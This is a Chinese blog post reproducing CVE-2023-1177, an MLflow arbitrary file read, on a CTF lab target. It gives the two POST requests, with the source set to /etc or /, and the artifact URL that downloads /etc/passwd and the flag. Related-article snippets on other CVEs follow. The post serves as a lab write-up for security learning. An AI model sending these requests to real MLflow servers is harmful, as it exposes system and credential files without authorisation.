【春秋云镜】CVE-2023-1177(Mlflow任意文件读取)复现

已于 2024-09-23 13:47:58 修改
阅读量288 收藏 4
点赞数 5
文章标签: 网络安全 web安全
于 2024-09-23 13:46:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44423566/article/details/142455361
版权

目录

前言

漏洞复现

前言

第二篇CVE漏洞复现文章,欢迎各位师傅评论区讨论。

漏洞复现

        靶场网站如下图所示。

        构造POC,先把一个文件上传到/ajax-api/2.0/mlflow/registered-models/create文件下,文件的名称随意,这里以testfile1为例,POC内容如下:

POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1
Host: x.x.x.x
Content-Type: application/json
Content-Length: 39

{"name": "testfile1"}

        POC复制到burpsuite的重发器里面发送,Host参数改成靶机地址,响应报文状态码为200时表示此文件以创建。

        然后在/ajax-api/2.0/mlflow/model-versions/create文件下上传需要读取的文件路径,POC如下所示,参数source用于指定要读取的文件所处的目录。

POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1
Host: x.x.x.x
Content-Type: application/json
Content-Length: 36

{"name": "testfile1", "source": "/etc"}

        同样的,将Host参数改成靶机的网址后发送。

        访问http://x.x.x.x/#/model-versions/get-artifact?path=passwd&name=testfile1&version=1即可下载对应文件。这里要注意参数path的值和name的值,path为已上传目录下的文件名,name为之前已上传的文件的名称。要访问/etc/passwd下的文件,path就设置为passwd,name设置为testfile1,如下图所示。

        下载的文件直接用记事本打开,文件内容如下。

        要读取根目录下的文件,只需要在/ajax-api/2.0/mlflow/model-versions/create文件下修改POST请求参数source的值为“/”即可。

        后续步骤不再赘述,最后下载的flag内容如下。

网安小登
关注
漏洞复现 Apache Flink CVE-2020-17519 任意文件读取漏洞
god_Zeo的安全博客
01-06 737
0x01 漏洞简介 Apache Flink Apache Flink是一个开源流处理框架,具有强大的流处理和批处理功能。 Apache Flink 1.11.0中引入的一项更改(包括版本1.11.1和1.11.2)允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件CVE-2020-17519 任意文件读取漏洞 Apache Flink 1.11.0中引入了一项更新,该更新在1.11.1及更高的版本和1.11.2中发布。 该项更新允许攻击者通过JobM
人工智能/机器学习工具中存在十几个可利用漏洞
smellycat000的专栏
11-20 234
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士自2023年8月起,人工智能 (AI) 和机器学习 (ML) 漏洞奖励平台 Huntr 发现了十几个漏洞,可导致AI/ML模型易受系统接管和敏感信息被盗攻击。Huntr 的管理平台 Protect AI指出,这些漏洞存在于每月下载量达到数十万或数百万的工具中,如 H2O-3、MLflow和Ray中,可能影响整个 AI/ML 供应链。H2O-3中的...
【高危】vm2 <3.9.17 沙箱逃逸漏洞(POC)(CVE-2023-30547 )
murphysec的博客
04-18 1106
vm2 是一个基于 Node.js 的沙箱环境,可以使用列入白名单的 Node 内置模块运行不受信任的代码。 由于 CVE-2023-29199 的修复不完整,vm2 3.9.17 之前版本的 transformer.js 文件中的 transformer 函数异常处理逻辑存在缺陷。攻击者可以利用这个缺陷,在 handleException() 函数中构造一个主机异常,从而绕过沙箱限制,实现在主机中执行任意代码的攻击。 该漏洞已存在POC。
春秋云镜 CVE-2023-26469
qq274575499的博客
03-29 2491
Jorani是一款开源的员工考勤和休假管理系统,适用于中小型企业和全球化组织,它简化了员工工时记录、休假请求和审批流程,并提供了多语言支持以满足不同地区的需求。在 Jorani 1.0.0 中,攻击者可以利用路径遍历来访问文件并在服务器上执行代码。
春秋云镜 CVE-2023-1313
qq274575499的博客
04-03 1288
cockpit在2.4.1版本之前存在任意文件上传漏洞PS:通过在浏览器中打开/install来运行安装。
春秋云镜 CVE-2023-27179
qq274575499的博客
03-28 914
GDidees CMS v3.9.1及更低版本被发现存在本地文件泄露漏洞,漏洞通过位于 /_admin/imgdownload.php 的 filename 参数进行利用。
春秋云镜 CVE-2023-1313 WP
m0_73649671的博客
04-17 855
春秋云镜 CVE-2023-1313 WP 介绍:cockpit在2.4.1版本之前存在任意文件上传漏洞PS:通过在浏览器中打开/install来运行安装。
MLflow 2.9.2 任意文件读取漏洞(CVE-2023-6977)
sheep_qm的博客
02-02 330
MLflow 2.9.2 任意文件读取漏洞(CVE-2023-6977)
[春秋云镜] CVE-2023-38836
m0_73649671的博客
04-21 1490
$finfo->file($tmp_name) 这行代码使用了 PHP 中的 FileInfo 扩展(File Information),它提供了一种获取文件信息的方式,特别是文件的 MIME 类型。 具体来说,$finfo->file($tmp_name) 这行代码的作用是读取临时文件的内容并返回其 MIME 类型。 然而这存在漏洞,它是对比文件的前几个字节来确定文件的 MIME 类型。 若我们在shell.php文件里前几个字节加上GIF89a 则这个文件的 MIME 类型 将会是image/gi
CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁
01-19
针对CVE-2023-6548 和 CVE-2023-6549 的 NetScaler ADC 和 NetScaler Gateway 的漏洞补丁升级包 CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响...
春秋云境 CVE-2022-4230 夺旗
05-02
### 春秋云境 CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
OpenSSH(CVE-2023-38408)一键升级修复-OpenSSH9.5p1
10-17
2023年,OpenSSH发现了一个名为CVE-2023-38408的安全漏洞,这个漏洞可能允许攻击者在特定条件下绕过身份验证或执行未授权的操作,对系统安全构成威胁。为了保护您的系统不受此漏洞影响,及时升级到OpenSSH 9.5p1...
CVE-2023-21768 Windows AFD 本地提权漏洞 C 源码
08-23
CVE-2023-21768 Windows Ancillary Function Driver (AFD) afd.sys本地提权漏洞。 AFD (Ancillary Function Driver)是Windows操作系统中的一个内核模式驱动程序。 漏洞原理: 该漏洞存在于AFD驱动程序处理用户...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8533
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
防火墙|WAF|漏洞|网络安全
最新发布
qq_43777616的博客
11-06 341
一种网络安全设备,监视网络流量,并且根据预定义的规则和策略检测阻止可能的网络攻击,可以部署在网络边界(不同安全级别的网络之间的连接形成了网络边界)、数据中心、云环境、边界防火墙等位置部署,以防止来自外部和内部网络的攻击。防火墙工作于OSI模型层次越高,检查数据包中的信息就越多,消耗的工作周期越长,提供的安全保护等级就越高。漏洞是指一个系统存在的弱点或缺陷,系统对特定威胁攻击或危险事件的敏感性,或进行攻击的威胁作用的可能性。单独的硬件,用于过滤进出网络的流量,适合大型企业。
网络安全从入门到精通(特别篇IIl):应急响应之病毒蠕虫处置流程
HACKONE的博客
11-06 53
排查 init.d 目录下的脚本文件,如果某个脚本启动的服务进程与名称不符,或者脚本文件的内容被修改,加有别的什么东西启动了别的进程,必须仔细排查,极可能是被用来启动后门进程了。排查C: \、C: \winnt、C: \winnt\System 、C: \winnt\ System32、C: \winnt\System32\dllcache、C: \winnt\System32\ drivers、各个Program Files目录下的内容,排查他们目录及文件的属性,若无版本说明,多为可疑文件
2024年网络安全进阶手册:黑客技术自学路线
2401_85026965的博客
10-29 1477
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
春秋云镜CVE-2023-38836
06-15
很抱歉,由于安全性和隐私保护原则,我无法提供详细的CVE(Common Vulnerabilities and Exposures)报告或漏洞分析,尤其是对于特定的漏洞如春秋云镜CVE-2023-38836。CVE是一个由美国国家网络安全中心维护的系统,用来标识信息安全漏洞。如果你需要了解某个CVE的具体信息,通常应该查阅官方的安全公告、厂商发布的声明,或者使用专业的安全资源和工具进行查询。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值